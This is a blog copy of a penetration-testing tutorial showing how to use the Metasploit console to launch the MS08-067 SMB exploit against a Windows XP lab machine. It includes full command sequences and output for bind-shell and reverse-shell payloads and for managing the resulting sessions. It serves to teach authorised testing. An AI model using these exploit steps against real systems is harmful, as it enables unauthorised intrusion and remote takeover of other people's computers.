본문 바로가기

개발/해킹

Using the Metasploit Console to Launch Exploits

$ ./msfconsole
                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888
        =[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 317 exploits - 93 auxiliary
+ -- --=[ 216 payloads - 20 encoders - 6 nops
        =[ svn r9114 updated today (2010.04.20)
msf >

The interesting commands to start with are

show <exploits | payloads>
info <exploit | payload> <name>
use <exploit-name>

You’ll find all the other commands by typing help or ?. To launch an MS08-067 exploit, we’ll first need to find the Metasploit name for this exploit. We can use the search command to do so:

msf > search ms08-067
[*] Searching loaded modules for pattern 'ms08-067'…
Exploits
========
   Name                         Rank   Description
   ----                         ----   -----------
   windows/smb/ms08_067_netapi  great  Microsoft Server Service Relative Path
                                       Stack Corruption


					  

The Metasploit name for this exploit is windows/smb/ms08_067_netapi. We’ll use that exploit and then go looking for all the options needed to make the exploit work:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >


Notice that the prompt changes to enter “exploit mode” when you use an exploit module. Any options or variables you set while configuring this exploit will be retained so that you don’t have to reset the options every time you run it. You can get back to the original launch state at the main console by issuing the back command:

msf exploit(ms08_067_netapi) > back
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Different exploits have different options. Let’s see what options need to be set to make the MS08-067 exploit work:

msf exploit(ms08_067_netapi) > show options
Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


					  

This exploit requires a target address, the port number on which SMB (Server Message Block) listens, and the name of the pipe exposing this functionality:

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.6
RHOST => 192.168.1.6


As you can see, the syntax to set an option is as follows:

set <OPTION-NAME> <option>

Note

Earlier versions of Metasploit were particular about the case of the option name and option, so examples in this chapter always use uppercase if the option is listed in uppercase.


With the exploit module set, we next need to set the payload. The payload is the action that happens after the vulnerability is exploited. It’s like choosing how you want to interact with the compromised machine if the vulnerability is triggered successfully. For this first example, let’s use a payload that simply opens a command shell listening on a TCP port:

msf exploit(ms08_067_netapi) > search "Windows Command Shell"
[*] Searching loaded modules for pattern 'Windows Command Shell'…
Compatible Payloads
===================
   Name                                Rank    Description
   ----                                ----    -----------
   windows/shell/bind_ipv6_tcp         normal  Windows Command Shell, Bind TCP
                                               Stager (IPv6)
   windows/shell/bind_nonx_tcp         normal  Windows Command Shell, Bind TCP
                                               Stager (No NX Support)
   windows/shell/bind_tcp              normal  Windows Command Shell, Bind TCP
                                                Stager
   windows/shell/reverse_ipv6_tcp      normal  Windows Command Shell, Reverse
                                               TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp      normal  Windows Command Shell, Reverse
                                               TCP Stager (No NX Support)
   windows/shell/reverse_ord_tcp       normal  Windows Command Shell, Reverse
                                               Ordinal TCP Stager
   windows/shell/reverse_tcp           normal  Windows Command Shell, Reverse
                                               TCP Stager
   windows/shell/reverse_tcp_allports  normal  Windows Command Shell, Reverse
                                               All-Port TCP Stager
   windows/shell/reverse_tcp_dns       normal  Windows Command Shell, Reverse
                                               TCP Stager (DNS)
   windows/shell_bind_tcp              normal  Windows Command Shell, Bind TCP
                                               Inline
   windows/shell_reverse_tcp           normal  Windows Command Shell, Reverse TCP
                                               Inline


					  

In typical gratuitous Metasploit style, there are 11 payloads that provide a Windows command shell. Some open a listener on the host, some cause the host to “phone home” to the attacking workstation, some use IPv6, some set up the command shell in one network roundtrip (“inline”), while others utilize multiple roundtrips (“staged”). One even connects back to the attacker tunneled over DNS. This Windows XP target virtual machine does not have a firewall enabled, so we’ll use a simple windows/shell/bind_tcp exploit:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp

If the target were running a firewall, we might instead choose a payload that would cause the compromised workstation to connect back to the attacker (“reverse”):

msf exploit(ms08_067_netapi) > show options
Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.6      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/bind_tcp):


					  

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LPORT     4444             yes       The local port
RHOST     192.168.1.6      no        The target address

By default, this exploit will open a listener on tcp port4444, allowing us to connect for the command shell. Let’s attempt the exploit:

msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (240 bytes) to 192.168.1.6
[*] Command shell session 1 opened (192.168.1.4:49623 -> 192.168.1.6:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>echo w00t!
echo w00t!
w00t!

It worked! We can verify the connection by issuing the netstat command from the Windows XP machine console, looking for established connections on port 4444:

C:\>netstat -ano | findstr 4444 | findstr ESTABLISHED
  TCP    192.168.1.6:4444       192.168.1.4:49623      ESTABLISHED 964

Referring back to the Metasploit output, the exploit attempt originated from 192.168.1.4:49623, matching the output we see in netstat. Let’s try a different payload. Press CTRL-Z to put this session into the background:

C:\>^Z
Background session 1? [y/N]  y
msf exploit(ms08_067_netapi) >

Now set the payload to windows/shell/reverse_tcp, the reverse shell that we discovered:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.6      yes        The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes        The local address
   LPORT     4444             yes       The local port


					  

This payload requires an additional option, LHOST. The victim needs to know to which host to connect when the exploit is successful.

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.4:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (240 bytes) to 192.168.1.6
[*] Command shell session 2 opened (192.168.1.4:4444 -> 192.168.1.6:1180)
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>echo w00t!
echo w00t!
w00t!

Notice that this is “session 2.” Press CTRL-Z to put this session in the background and go back to the Metasploit prompt. Then, issue the command sessions –l to list all active sessions:

Background session 2? [y/N]  y
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
  Id  Type   Information                              Connection
  --  ----   -----------                              ----------
  1   shell                                           192.168.1.4:49623 ->
192.168.1.6:4444
  2   shell  Microsoft Windows XP [Version 5.1.2600]  192.168.1.4:4444 ->
192.168.1.6:1180

It’s easy to bounce back and forth between these two sessions. Just use the sessions –i <session>. If you don’t get a prompt immediately, try pressing ENTER.

msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1…
C:\>^Z
Background session 1? [y/N] y
msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2…
C:\WINDOWS\system32>


You now know the most important Metasploit console commands and understand the basic exploit-launching process. Next, we’ll explore other ways to use Metasploit in the penetration testing process.